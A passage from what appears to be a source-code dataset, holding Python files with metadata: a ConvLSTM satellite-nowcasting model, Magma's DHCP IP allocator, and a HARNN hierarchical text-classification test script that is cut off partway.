self.decoder_2_convlstm = ConvLSTMCell(
input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.decoder_CNN = nn.Conv3d(
in_channels=hidden_dim,
out_channels=out_channels,
kernel_size=(1, 3, 3),
padding=(0, 1, 1),
)
def autoencoder(self, x, seq_len, future_step, h_t, c_t, h_t2, c_t2, h_t3, c_t3, h_t4, c_t4):
outputs = []
# encoder
for t in range(seq_len):
h_t, c_t = self.encoder_1_convlstm(
input_tensor=x[:, t, :, :], cur_state=[h_t, c_t]
) # we could concat to provide skip conn here
h_t2, c_t2 = self.encoder_2_convlstm(
input_tensor=h_t, cur_state=[h_t2, c_t2]
) # we could concat to provide skip conn here
# encoder_vector
encoder_vector = h_t2
# decoder
for t in range(future_step):
h_t3, c_t3 = self.decoder_1_convlstm(
input_tensor=encoder_vector, cur_state=[h_t3, c_t3]
) # we could concat to provide skip conn here
h_t4, c_t4 = self.decoder_2_convlstm(
input_tensor=h_t3, cur_state=[h_t4, c_t4]
) # we could concat to provide skip conn here
encoder_vector = h_t4
outputs += [h_t4] # predictions
outputs = torch.stack(outputs, 1)
outputs = outputs.permute(0, 2, 1, 3, 4)
outputs = self.decoder_CNN(outputs)
outputs = torch.nn.Sigmoid()(outputs)
return outputs
def forward(self, x, forecast_steps=0, hidden_state=None):
"""
Parameters
----------
input_tensor:
5-D Tensor of shape (b, t, c, h, w) # batch, time, channel, height, width
"""
# find size of different input dimensions
b, seq_len, _, h, w = x.size()
# initialize hidden states
h_t, c_t = self.encoder_1_convlstm.init_hidden(batch_size=b, image_size=(h, w))
h_t2, c_t2 = self.encoder_2_convlstm.init_hidden(batch_size=b, image_size=(h, w))
h_t3, c_t3 = self.decoder_1_convlstm.init_hidden(batch_size=b, image_size=(h, w))
h_t4, c_t4 = self.decoder_2_convlstm.init_hidden(batch_size=b, image_size=(h, w))
# autoencoder forward
outputs = self.autoencoder(
x, seq_len, forecast_steps, h_t, c_t, h_t2, c_t2, h_t3, c_t3, h_t4, c_t4
)
return outputs
| 37.991342 | 120 | 0.592183 | from typing import Any, Dict, Union
import pytorch_lightning as pl
import torch
import torch.nn as nn
import numpy as np
from nowcasting_utils.models.base import register_model
from nowcasting_utils.models.loss import get_loss
from satflow.models.layers.ConvLSTM import ConvLSTMCell
import torchvision
@register_model
class EncoderDecoderConvLSTM(pl.LightningModule):
def __init__(
self,
hidden_dim: int = 64,
input_channels: int = 12,
out_channels: int = 1,
forecast_steps: int = 48,
lr: float = 0.001,
visualize: bool = False,
loss: Union[str, torch.nn.Module] = "mse",
pretrained: bool = False,
conv_type: str = "standard",
):
super(EncoderDecoderConvLSTM, self).__init__()
self.forecast_steps = forecast_steps
self.criterion = get_loss(loss)
self.lr = lr
self.visualize = visualize
self.model = ConvLSTM(input_channels, hidden_dim, out_channels, conv_type=conv_type)
self.save_hyperparameters()
@classmethod
def from_config(cls, config):
return EncoderDecoderConvLSTM(
hidden_dim=config.get("num_hidden", 64),
input_channels=config.get("in_channels", 12),
out_channels=config.get("out_channels", 1),
forecast_steps=config.get("forecast_steps", 1),
lr=config.get("lr", 0.001),
)
def forward(self, x, future_seq=0, hidden_state=None):
return self.model.forward(x, future_seq, hidden_state)
def configure_optimizers(self):
return torch.optim.Adam(self.parameters(), lr=self.lr)
def training_step(self, batch, batch_idx):
x, y = batch
y_hat = self(x, self.forecast_steps)
y_hat = torch.permute(y_hat, dims=(0, 2, 1, 3, 4))
loss = self.criterion(y_hat, y)
self.log("train/loss", loss, on_step=True)
frame_loss_dict = {}
for f in range(self.forecast_steps):
frame_loss = self.criterion(y_hat[:, f, :, :, :], y[:, f, :, :, :]).item()
frame_loss_dict[f"train/frame_{f}_loss"] = frame_loss
self.log_dict(frame_loss_dict, on_step=False, on_epoch=True)
return loss
def validation_step(self, batch, batch_idx):
x, y = batch
y_hat = self(x, self.forecast_steps)
y_hat = torch.permute(y_hat, dims=(0, 2, 1, 3, 4))
val_loss = self.criterion(y_hat, y)
frame_loss_dict = {}
for f in range(self.forecast_steps):
frame_loss = self.criterion(y_hat[:, f, :, :, :], y[:, f, :, :, :]).item()
frame_loss_dict[f"val/frame_{f}_loss"] = frame_loss
self.log("val/loss", val_loss, on_step=True, on_epoch=True)
self.log_dict(frame_loss_dict, on_step=False, on_epoch=True)
return val_loss
def test_step(self, batch, batch_idx):
x, y = batch
y_hat = self(x, self.forecast_steps)
loss = self.criterion(y_hat, y)
return loss
def visualize_step(self, x, y, y_hat, batch_idx, step="train"):
tensorboard = self.logger.experiment[0]
if len(x.shape) == 5:
images = x[0].cpu().detach()
for i, t in enumerate(images):
t = [torch.unsqueeze(img, dim=0) for img in t]
image_grid = torchvision.utils.make_grid(t, nrow=self.input_channels)
tensorboard.add_image(
f"{step}/Input_Image_Stack_Frame_{i}", image_grid, global_step=batch_idx
)
images = y[0].cpu().detach()
for i, t in enumerate(images):
t = [torch.unsqueeze(img, dim=0) for img in t]
image_grid = torchvision.utils.make_grid(t, nrow=self.output_channels)
tensorboard.add_image(
f"{step}/Target_Image_Stack_Frame_{i}", image_grid, global_step=batch_idx
)
images = y_hat[0].cpu().detach()
for i, t in enumerate(images):
t = [torch.unsqueeze(img, dim=0) for img in t]
image_grid = torchvision.utils.make_grid(t, nrow=self.output_channels)
tensorboard.add_image(
f"{step}/Generated_Stack_Frame_{i}", image_grid, global_step=batch_idx
)
class ConvLSTM(torch.nn.Module):
def __init__(self, input_channels, hidden_dim, out_channels, conv_type: str = "standard"):
super().__init__()
self.encoder_1_convlstm = ConvLSTMCell(
input_dim=input_channels,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.encoder_2_convlstm = ConvLSTMCell(
input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.decoder_1_convlstm = ConvLSTMCell(
input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.decoder_2_convlstm = ConvLSTMCell(
input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.decoder_CNN = nn.Conv3d(
in_channels=hidden_dim,
out_channels=out_channels,
kernel_size=(1, 3, 3),
padding=(0, 1, 1),
)
def autoencoder(self, x, seq_len, future_step, h_t, c_t, h_t2, c_t2, h_t3, c_t3, h_t4, c_t4):
outputs = []
for t in range(seq_len):
h_t, c_t = self.encoder_1_convlstm(
input_tensor=x[:, t, :, :], cur_state=[h_t, c_t]
)
h_t2, c_t2 = self.encoder_2_convlstm(
input_tensor=h_t, cur_state=[h_t2, c_t2]
)
encoder_vector = h_t2
for t in range(future_step):
h_t3, c_t3 = self.decoder_1_convlstm(
input_tensor=encoder_vector, cur_state=[h_t3, c_t3]
)
h_t4, c_t4 = self.decoder_2_convlstm(
input_tensor=h_t3, cur_state=[h_t4, c_t4]
)
encoder_vector = h_t4
outputs += [h_t4]
outputs = torch.stack(outputs, 1)
outputs = outputs.permute(0, 2, 1, 3, 4)
outputs = self.decoder_CNN(outputs)
outputs = torch.nn.Sigmoid()(outputs)
return outputs
def forward(self, x, forecast_steps=0, hidden_state=None):
b, seq_len, _, h, w = x.size()
h_t, c_t = self.encoder_1_convlstm.init_hidden(batch_size=b, image_size=(h, w))
h_t2, c_t2 = self.encoder_2_convlstm.init_hidden(batch_size=b, image_size=(h, w))
h_t3, c_t3 = self.decoder_1_convlstm.init_hidden(batch_size=b, image_size=(h, w))
h_t4, c_t4 = self.decoder_2_convlstm.init_hidden(batch_size=b, image_size=(h, w))
outputs = self.autoencoder(
x, seq_len, forecast_steps, h_t, c_t, h_t2, c_t2, h_t3, c_t3, h_t4, c_t4
)
return outputs
| true | true |
1c3062baff364bcff6794e9cf5af2e1815c2aa40 | 7,095 | py | Python | lte/gateway/python/magma/mobilityd/ip_allocator_dhcp.py | Milind-Blaze/magma | b54257e997ad55781752e644e62efe9a7cca4501 | [
"BSD-3-Clause"
] | null | null | null | lte/gateway/python/magma/mobilityd/ip_allocator_dhcp.py | Milind-Blaze/magma | b54257e997ad55781752e644e62efe9a7cca4501 | [
"BSD-3-Clause"
] | null | null | null | lte/gateway/python/magma/mobilityd/ip_allocator_dhcp.py | Milind-Blaze/magma | b54257e997ad55781752e644e62efe9a7cca4501 | [
"BSD-3-Clause"
] | null | null | null | """
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Allocates IP address as per DHCP server in the uplink network.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import logging
from copy import deepcopy
from ipaddress import ip_address, ip_network
from threading import Condition
from typing import List
from magma.mobilityd.ip_descriptor import IPDesc, IPState, IPType
from .dhcp_client import DHCPClient
from .dhcp_desc import DHCPDescriptor, DHCPState
from .ip_allocator_base import IPAllocator, NoAvailableIPError
from .mac import MacAddress, create_mac_from_sid
from .mobility_store import MobilityStore
from .utils import IPAddress, IPNetwork
DEFAULT_DHCP_REQUEST_RETRY_FREQUENCY = 10
DEFAULT_DHCP_REQUEST_RETRY_DELAY = 1
LOG = logging.getLogger('mobilityd.dhcp.alloc')
class IPAllocatorDHCP(IPAllocator):
def __init__(
self, store: MobilityStore, retry_limit: int = 300,
iface: str = "dhcp0",
):
"""
Allocate IP address for SID using DHCP server.
SID is mapped to MAC address using function defined in mac.py
then this mac address used in DHCP request to allocate new IP
from DHCP server.
This IP is also cached to improve performance in case of
reallocation for same SID in short period of time.
Args:
store: Moblityd storage instance
retry_limit: try DHCP request
iface: DHCP interface.
"""
self._store = store
self.dhcp_wait = Condition()
self._dhcp_client = DHCPClient(
dhcp_wait=self.dhcp_wait,
dhcp_store=store.dhcp_store,
gw_info=store.dhcp_gw_info,
iface=iface,
)
self._retry_limit = retry_limit # default wait for two minutes
self._dhcp_client.run()
def add_ip_block(self, ipblock: IPNetwork):
logging.warning(
"No need to allocate block for DHCP allocator: %s",
ipblock,
)
def remove_ip_blocks(
self,
ipblocks: List[IPNetwork],
force: bool = False,
) -> List[IPNetwork]:
logging.warning(
"Trying to delete ipblock from DHCP allocator: %s",
ipblocks,
)
return []
def list_added_ip_blocks(self) -> List[IPNetwork]:
return list(deepcopy(self._store.assigned_ip_blocks))
def list_allocated_ips(self, ipblock: IPNetwork) -> List[IPAddress]:
""" List IP addresses allocated from a given IP block
Args:
ipblock (ipaddress.ip_network): ip network to add
e.g. ipaddress.ip_network("10.0.0.0/24")
Return:
list of IP addresses (ipaddress.ip_address)
"""
return [
ip for ip in
self._store.ip_state_map.list_ips(IPState.ALLOCATED)
if ip in ipblock
]
def alloc_ip_address(self, sid: str, vlan_id: int) -> IPDesc:
"""
Assumption: one-to-one mappings between SID and IP.
Args:
sid (string): universal subscriber id
vlan_id: vlan of the APN
Returns:
ipaddress.ip_address: IP address allocated
Raises:
NoAvailableIPError: if run out of available IP addresses
"""
mac = create_mac_from_sid(sid)
dhcp_desc = self._dhcp_client.get_dhcp_desc(mac, str(vlan_id))
LOG.debug(
"allocate IP for %s mac %s dhcp_desc %s", sid, mac,
dhcp_desc,
)
if dhcp_allocated_ip(dhcp_desc) is not True:
dhcp_desc = self._alloc_ip_address_from_dhcp(mac, vlan_id)
if dhcp_allocated_ip(dhcp_desc):
ip_block = ip_network(dhcp_desc.subnet)
ip_desc = IPDesc(
ip=ip_address(dhcp_desc.ip),
state=IPState.ALLOCATED,
sid=sid,
ip_block=ip_block,
ip_type=IPType.DHCP,
vlan_id=vlan_id,
)
self._store.assigned_ip_blocks.add(ip_block)
return ip_desc
else:
msg = "No available IP addresses From DHCP for SID: {} MAC {}".format(
sid, mac,
)
raise NoAvailableIPError(msg)
def release_ip(self, ip_desc: IPDesc):
"""
Release IP address, this involves following steps.
1. send DHCP protocol packet to release the IP.
2. update IP block list.
3. update IP from ip-state.
Args:
ip_desc: release needs following info from IPDesc.
SID used to get mac address, IP assigned to this SID,
IP block of the IP address, vlan id of the APN.
Returns: None
"""
self._dhcp_client.release_ip_address(
create_mac_from_sid(ip_desc.sid),
ip_desc.vlan_id,
)
# Remove the IP from free IP list, since DHCP is the
# owner of this IP
self._store.ip_state_map.remove_ip_from_state(ip_desc.ip, IPState.FREE)
list_allocated_ips = self._store.ip_state_map.list_ips(
IPState.ALLOCATED,
)
for ipaddr in list_allocated_ips:
if ipaddr in ip_desc.ip_block:
# found the IP, do not remove this ip_block
return
ip_block_network = ip_network(ip_desc.ip_block)
if ip_block_network in self._store.assigned_ip_blocks:
self._store.assigned_ip_blocks.remove(ip_block_network)
logging.debug(
"del: _assigned_ip_blocks %s ipblock %s",
self._store.assigned_ip_blocks, ip_desc.ip_block,
)
def stop_dhcp_sniffer(self):
self._dhcp_client.stop()
def _alloc_ip_address_from_dhcp(
self, mac: MacAddress,
vlan: int,
) -> DHCPDescriptor:
retry_count = 0
with self.dhcp_wait:
dhcp_desc = None
while (
retry_count < self._retry_limit
and dhcp_allocated_ip(dhcp_desc) is not True
):
if retry_count % DEFAULT_DHCP_REQUEST_RETRY_FREQUENCY == 0:
self._dhcp_client.send_dhcp_packet(
mac, vlan,
DHCPState.DISCOVER,
)
self.dhcp_wait.wait(timeout=DEFAULT_DHCP_REQUEST_RETRY_DELAY)
dhcp_desc = self._dhcp_client.get_dhcp_desc(mac, vlan)
retry_count = retry_count + 1
return dhcp_desc
def dhcp_allocated_ip(dhcp_desc) -> bool:
return dhcp_desc is not None and dhcp_desc.ip_is_allocated()
| 31.959459 | 82 | 0.622974 |
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import logging
from copy import deepcopy
from ipaddress import ip_address, ip_network
from threading import Condition
from typing import List
from magma.mobilityd.ip_descriptor import IPDesc, IPState, IPType
from .dhcp_client import DHCPClient
from .dhcp_desc import DHCPDescriptor, DHCPState
from .ip_allocator_base import IPAllocator, NoAvailableIPError
from .mac import MacAddress, create_mac_from_sid
from .mobility_store import MobilityStore
from .utils import IPAddress, IPNetwork
DEFAULT_DHCP_REQUEST_RETRY_FREQUENCY = 10
DEFAULT_DHCP_REQUEST_RETRY_DELAY = 1
LOG = logging.getLogger('mobilityd.dhcp.alloc')
class IPAllocatorDHCP(IPAllocator):
def __init__(
self, store: MobilityStore, retry_limit: int = 300,
iface: str = "dhcp0",
):
self._store = store
self.dhcp_wait = Condition()
self._dhcp_client = DHCPClient(
dhcp_wait=self.dhcp_wait,
dhcp_store=store.dhcp_store,
gw_info=store.dhcp_gw_info,
iface=iface,
)
self._retry_limit = retry_limit
self._dhcp_client.run()
def add_ip_block(self, ipblock: IPNetwork):
logging.warning(
"No need to allocate block for DHCP allocator: %s",
ipblock,
)
def remove_ip_blocks(
self,
ipblocks: List[IPNetwork],
force: bool = False,
) -> List[IPNetwork]:
logging.warning(
"Trying to delete ipblock from DHCP allocator: %s",
ipblocks,
)
return []
def list_added_ip_blocks(self) -> List[IPNetwork]:
return list(deepcopy(self._store.assigned_ip_blocks))
def list_allocated_ips(self, ipblock: IPNetwork) -> List[IPAddress]:
return [
ip for ip in
self._store.ip_state_map.list_ips(IPState.ALLOCATED)
if ip in ipblock
]
def alloc_ip_address(self, sid: str, vlan_id: int) -> IPDesc:
mac = create_mac_from_sid(sid)
dhcp_desc = self._dhcp_client.get_dhcp_desc(mac, str(vlan_id))
LOG.debug(
"allocate IP for %s mac %s dhcp_desc %s", sid, mac,
dhcp_desc,
)
if dhcp_allocated_ip(dhcp_desc) is not True:
dhcp_desc = self._alloc_ip_address_from_dhcp(mac, vlan_id)
if dhcp_allocated_ip(dhcp_desc):
ip_block = ip_network(dhcp_desc.subnet)
ip_desc = IPDesc(
ip=ip_address(dhcp_desc.ip),
state=IPState.ALLOCATED,
sid=sid,
ip_block=ip_block,
ip_type=IPType.DHCP,
vlan_id=vlan_id,
)
self._store.assigned_ip_blocks.add(ip_block)
return ip_desc
else:
msg = "No available IP addresses From DHCP for SID: {} MAC {}".format(
sid, mac,
)
raise NoAvailableIPError(msg)
def release_ip(self, ip_desc: IPDesc):
self._dhcp_client.release_ip_address(
create_mac_from_sid(ip_desc.sid),
ip_desc.vlan_id,
)
self._store.ip_state_map.remove_ip_from_state(ip_desc.ip, IPState.FREE)
list_allocated_ips = self._store.ip_state_map.list_ips(
IPState.ALLOCATED,
)
for ipaddr in list_allocated_ips:
if ipaddr in ip_desc.ip_block:
return
ip_block_network = ip_network(ip_desc.ip_block)
if ip_block_network in self._store.assigned_ip_blocks:
self._store.assigned_ip_blocks.remove(ip_block_network)
logging.debug(
"del: _assigned_ip_blocks %s ipblock %s",
self._store.assigned_ip_blocks, ip_desc.ip_block,
)
def stop_dhcp_sniffer(self):
self._dhcp_client.stop()
def _alloc_ip_address_from_dhcp(
self, mac: MacAddress,
vlan: int,
) -> DHCPDescriptor:
retry_count = 0
with self.dhcp_wait:
dhcp_desc = None
while (
retry_count < self._retry_limit
and dhcp_allocated_ip(dhcp_desc) is not True
):
if retry_count % DEFAULT_DHCP_REQUEST_RETRY_FREQUENCY == 0:
self._dhcp_client.send_dhcp_packet(
mac, vlan,
DHCPState.DISCOVER,
)
self.dhcp_wait.wait(timeout=DEFAULT_DHCP_REQUEST_RETRY_DELAY)
dhcp_desc = self._dhcp_client.get_dhcp_desc(mac, vlan)
retry_count = retry_count + 1
return dhcp_desc
def dhcp_allocated_ip(dhcp_desc) -> bool:
return dhcp_desc is not None and dhcp_desc.ip_is_allocated()
| true | true |
1c3062d47ecc1550f5535f38c0e344d751d76367 | 8,920 | py | Python | HARNN/test_harnn.py | TownShaw/Hierarchical-Multi-Label-Text-Classification | e7d0f8d29b8c7b37b951c547b62b9655011fb0be | [
"Apache-2.0"
] | 225 | 2019-09-06T05:21:20.000Z | 2022-03-29T08:36:33.000Z | HARNN/test_harnn.py | TownShaw/Hierarchical-Multi-Label-Text-Classification | e7d0f8d29b8c7b37b951c547b62b9655011fb0be | [
"Apache-2.0"
] | 18 | 2019-12-21T14:43:32.000Z | 2021-12-16T07:13:19.000Z | HARNN/test_harnn.py | TownShaw/Hierarchical-Multi-Label-Text-Classification | e7d0f8d29b8c7b37b951c547b62b9655011fb0be | [
"Apache-2.0"
] | 53 | 2019-10-09T13:36:15.000Z | 2022-03-21T09:04:02.000Z | # -*- coding:utf-8 -*-
__author__ = 'Randolph'
import os
import sys
import time
import logging
import numpy as np
sys.path.append('../')
logging.getLogger('tensorflow').disabled = True
import tensorflow as tf
from utils import checkmate as cm
from utils import data_helpers as dh
from utils import param_parser as parser
from sklearn.metrics import precision_score, recall_score, f1_score, roc_auc_score, average_precision_score
# Shared command-line / hyper-parameter configuration for the HARNN scripts.
args = parser.parameter_parser()
# Identifier of the trained model run; used below to locate its checkpoint
# and output directories (exact source of the name lives in data_helpers).
MODEL = dh.get_model_name()
logger = dh.logger_fn("tflog", "logs/Test-{0}.log".format(time.asctime()))

# Directory layout produced by training: regular vs. best checkpoints, plus
# a per-model output directory for prediction results.
CPT_DIR = 'runs/{0}/checkpoints/'.format(MODEL)
BEST_CPT_DIR = 'runs/{0}/bestcheckpoints/'.format(MODEL)
SAVE_DIR = 'output/{0}'.format(MODEL)
def create_input_data(data: dict):
    """Zip the per-record fields of a processed dataset dict.

    Yields tuples of (padded token ids, section labels, subsection labels,
    group labels, subgroup labels, one-hot labels, raw labels), one tuple
    per record, in the fixed order the evaluation loop expects.
    """
    field_keys = ('pad_seqs', 'section', 'subsection', 'group',
                  'subgroup', 'onehot_labels', 'labels')
    return zip(*(data[key] for key in field_keys))
def test_harnn():
    """Evaluate a trained HARNN model on the test set.

    Restores the selected checkpoint (best or latest), exports a frozen
    inference-only .pb graph, runs batched inference over the test data,
    logs micro-averaged Precision/Recall/F1 (plus AUC/AUPRC) for the
    global output and each hierarchy level, and writes per-record
    predictions to SAVE_DIR/predictions.json.
    """
    # Log the parsed hyper-parameters for this evaluation run.
    dh.tab_printer(args, logger)
    # Load word2vec vocabulary.  NOTE: embedding_matrix is unused here;
    # only word2idx is needed to map test tokens to ids.
    word2idx, embedding_matrix = dh.load_word2vec_matrix(args.word2vec_file)
    # Load and preprocess the test split.
    logger.info("Loading data...")
    logger.info("Data processing...")
    test_data = dh.load_data_and_labels(args, args.test_file, word2idx)
    # Choose which checkpoint to restore: 'B' = best-scoring, otherwise latest.
    OPTION = dh._option(pattern=1)
    if OPTION == 'B':
        logger.info("Loading best model...")
        checkpoint_file = cm.get_best_checkpoint(BEST_CPT_DIR, select_maximum_value=True)
    else:
        logger.info("Loading latest model...")
        checkpoint_file = tf.train.latest_checkpoint(CPT_DIR)
    logger.info(checkpoint_file)
    graph = tf.Graph()
    with graph.as_default():
        session_conf = tf.ConfigProto(
            allow_soft_placement=args.allow_soft_placement,
            log_device_placement=args.log_device_placement)
        session_conf.gpu_options.allow_growth = args.gpu_options_allow_growth
        sess = tf.Session(config=session_conf)
        with sess.as_default():
            # Rebuild the graph from the .meta file and restore the weights.
            saver = tf.train.import_meta_graph("{0}.meta".format(checkpoint_file))
            saver.restore(sess, checkpoint_file)
            # Look up the input placeholders by the names they were saved under.
            input_x = graph.get_operation_by_name("input_x").outputs[0]
            input_y_first = graph.get_operation_by_name("input_y_first").outputs[0]
            input_y_second = graph.get_operation_by_name("input_y_second").outputs[0]
            input_y_third = graph.get_operation_by_name("input_y_third").outputs[0]
            input_y_fourth = graph.get_operation_by_name("input_y_fourth").outputs[0]
            input_y = graph.get_operation_by_name("input_y").outputs[0]
            dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
            alpha = graph.get_operation_by_name("alpha").outputs[0]
            is_training = graph.get_operation_by_name("is_training").outputs[0]
            # Output tensors: one score tensor per hierarchy level plus the
            # combined/global scores.
            first_scores = graph.get_operation_by_name("first-output/scores").outputs[0]
            second_scores = graph.get_operation_by_name("second-output/scores").outputs[0]
            third_scores = graph.get_operation_by_name("third-output/scores").outputs[0]
            fourth_scores = graph.get_operation_by_name("fourth-output/scores").outputs[0]
            scores = graph.get_operation_by_name("output/scores").outputs[0]
            # Split the output nodes name by '|' if you have several output nodes
            output_node_names = "first-output/scores|second-output/scores|third-output/scores|fourth-output/scores|output/scores"
            # Freeze variables into constants and save an inference-only
            # .pb graph alongside the checkpoints.
            output_graph_def = tf.graph_util.convert_variables_to_constants(sess, sess.graph_def,
                                                                            output_node_names.split("|"))
            tf.train.write_graph(output_graph_def, "graph", "graph-harnn-{0}.pb".format(MODEL), as_text=False)
            # Generate batches for one epoch; shuffle=False keeps batch order
            # aligned with test_data['id'] for the prediction file below.
            batches = dh.batch_iter(list(create_input_data(test_data)), args.batch_size, 1, shuffle=False)
            # Collect the predictions here
            true_labels = []
            predicted_labels = []
            predicted_scores = []
            # Per-output accumulators: index 0 is the global output,
            # indices 1-4 are hierarchy levels 1-4.
            true_onehot_labels = [[], [], [], [], []]
            predicted_onehot_scores = [[], [], [], [], []]
            predicted_onehot_labels = [[], [], [], [], []]
            for batch_test in batches:
                x, sec, subsec, group, subgroup, y_onehot, y = zip(*batch_test)
                # Ground truth per output, in the same order as batch_scores.
                y_batch_test_list = [y_onehot, sec, subsec, group, subgroup]
                feed_dict = {
                    input_x: x,
                    input_y_first: sec,
                    input_y_second: subsec,
                    input_y_third: group,
                    input_y_fourth: subgroup,
                    input_y: y_onehot,
                    dropout_keep_prob: 1.0,
                    alpha: args.alpha,
                    is_training: False
                }
                batch_global_scores, batch_first_scores, batch_second_scores, batch_third_scores, batch_fourth_scores = \
                    sess.run([scores, first_scores, second_scores, third_scores, fourth_scores], feed_dict)
                batch_scores = [batch_global_scores, batch_first_scores, batch_second_scores,
                                batch_third_scores, batch_fourth_scores]
                # Get the predicted labels (from the global scores) by threshold
                batch_predicted_labels_ts, batch_predicted_scores_ts = \
                    dh.get_label_threshold(scores=batch_scores[0], threshold=args.threshold)
                # Add results to collection
                for labels in y:
                    true_labels.append(labels)
                for labels in batch_predicted_labels_ts:
                    predicted_labels.append(labels)
                for values in batch_predicted_scores_ts:
                    predicted_scores.append(values)
                # Accumulate one-hot truths/scores/predictions per output.
                for index in range(len(predicted_onehot_scores)):
                    for onehot_labels in y_batch_test_list[index]:
                        true_onehot_labels[index].append(onehot_labels)
                    for onehot_scores in batch_scores[index]:
                        predicted_onehot_scores[index].append(onehot_scores)
                    # Get one-hot prediction by threshold
                    predicted_onehot_labels_ts = \
                        dh.get_onehot_label_threshold(scores=batch_scores[index], threshold=args.threshold)
                    for onehot_labels in predicted_onehot_labels_ts:
                        predicted_onehot_labels[index].append(onehot_labels)
            # Calculate micro-averaged Precision & Recall & F1 (plus AUC and
            # AUPRC) for the global output and for each hierarchy level.
            for index in range(len(predicted_onehot_scores)):
                test_pre = precision_score(y_true=np.array(true_onehot_labels[index]),
                                           y_pred=np.array(predicted_onehot_labels[index]), average='micro')
                test_rec = recall_score(y_true=np.array(true_onehot_labels[index]),
                                        y_pred=np.array(predicted_onehot_labels[index]), average='micro')
                test_F1 = f1_score(y_true=np.array(true_onehot_labels[index]),
                                   y_pred=np.array(predicted_onehot_labels[index]), average='micro')
                test_auc = roc_auc_score(y_true=np.array(true_onehot_labels[index]),
                                         y_score=np.array(predicted_onehot_scores[index]), average='micro')
                test_prc = average_precision_score(y_true=np.array(true_onehot_labels[index]),
                                                   y_score=np.array(predicted_onehot_scores[index]), average="micro")
                if index == 0:
                    logger.info("[Global] Predict by threshold: Precision {0:g}, Recall {1:g}, "
                                "F1 {2:g}, AUC {3:g}, AUPRC {4:g}"
                                .format(test_pre, test_rec, test_F1, test_auc, test_prc))
                else:
                    logger.info("[Local] Predict by threshold in Level-{0}: Precision {1:g}, Recall {2:g}, "
                                "F1 {3:g}, AUPRC {4:g}".format(index, test_pre, test_rec, test_F1, test_prc))
            # Save the per-record prediction result as JSON.
            if not os.path.exists(SAVE_DIR):
                os.makedirs(SAVE_DIR)
            dh.create_prediction_file(output_file=SAVE_DIR + "/predictions.json", data_id=test_data['id'],
                                      true_labels=true_labels, predict_labels=predicted_labels,
                                      predict_scores=predicted_scores)
    logger.info("All Done.")
# Script entry point: run the evaluation when executed directly.
if __name__ == '__main__':
    test_harnn()
| 48.743169 | 129 | 0.610762 |
__author__ = 'Randolph'
import os
import sys
import time
import logging
import numpy as np
sys.path.append('../')
logging.getLogger('tensorflow').disabled = True
import tensorflow as tf
from utils import checkmate as cm
from utils import data_helpers as dh
from utils import param_parser as parser
from sklearn.metrics import precision_score, recall_score, f1_score, roc_auc_score, average_precision_score
args = parser.parameter_parser()
MODEL = dh.get_model_name()
logger = dh.logger_fn("tflog", "logs/Test-{0}.log".format(time.asctime()))
CPT_DIR = 'runs/' + MODEL + '/checkpoints/'
BEST_CPT_DIR = 'runs/' + MODEL + '/bestcheckpoints/'
SAVE_DIR = 'output/' + MODEL
def create_input_data(data: dict):
return zip(data['pad_seqs'], data['section'], data['subsection'], data['group'],
data['subgroup'], data['onehot_labels'], data['labels'])
def test_harnn():
dh.tab_printer(args, logger)
word2idx, embedding_matrix = dh.load_word2vec_matrix(args.word2vec_file)
logger.info("Loading data...")
logger.info("Data processing...")
test_data = dh.load_data_and_labels(args, args.test_file, word2idx)
OPTION = dh._option(pattern=1)
if OPTION == 'B':
logger.info("Loading best model...")
checkpoint_file = cm.get_best_checkpoint(BEST_CPT_DIR, select_maximum_value=True)
else:
logger.info("Loading latest model...")
checkpoint_file = tf.train.latest_checkpoint(CPT_DIR)
logger.info(checkpoint_file)
graph = tf.Graph()
with graph.as_default():
session_conf = tf.ConfigProto(
allow_soft_placement=args.allow_soft_placement,
log_device_placement=args.log_device_placement)
session_conf.gpu_options.allow_growth = args.gpu_options_allow_growth
sess = tf.Session(config=session_conf)
with sess.as_default():
saver = tf.train.import_meta_graph("{0}.meta".format(checkpoint_file))
saver.restore(sess, checkpoint_file)
input_x = graph.get_operation_by_name("input_x").outputs[0]
input_y_first = graph.get_operation_by_name("input_y_first").outputs[0]
input_y_second = graph.get_operation_by_name("input_y_second").outputs[0]
input_y_third = graph.get_operation_by_name("input_y_third").outputs[0]
input_y_fourth = graph.get_operation_by_name("input_y_fourth").outputs[0]
input_y = graph.get_operation_by_name("input_y").outputs[0]
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
alpha = graph.get_operation_by_name("alpha").outputs[0]
is_training = graph.get_operation_by_name("is_training").outputs[0]
first_scores = graph.get_operation_by_name("first-output/scores").outputs[0]
second_scores = graph.get_operation_by_name("second-output/scores").outputs[0]
third_scores = graph.get_operation_by_name("third-output/scores").outputs[0]
fourth_scores = graph.get_operation_by_name("fourth-output/scores").outputs[0]
scores = graph.get_operation_by_name("output/scores").outputs[0]
output_node_names = "first-output/scores|second-output/scores|third-output/scores|fourth-output/scores|output/scores"
output_graph_def = tf.graph_util.convert_variables_to_constants(sess, sess.graph_def,
output_node_names.split("|"))
tf.train.write_graph(output_graph_def, "graph", "graph-harnn-{0}.pb".format(MODEL), as_text=False)
batches = dh.batch_iter(list(create_input_data(test_data)), args.batch_size, 1, shuffle=False)
true_labels = []
predicted_labels = []
predicted_scores = []
true_onehot_labels = [[], [], [], [], []]
predicted_onehot_scores = [[], [], [], [], []]
predicted_onehot_labels = [[], [], [], [], []]
for batch_test in batches:
x, sec, subsec, group, subgroup, y_onehot, y = zip(*batch_test)
y_batch_test_list = [y_onehot, sec, subsec, group, subgroup]
feed_dict = {
input_x: x,
input_y_first: sec,
input_y_second: subsec,
input_y_third: group,
input_y_fourth: subgroup,
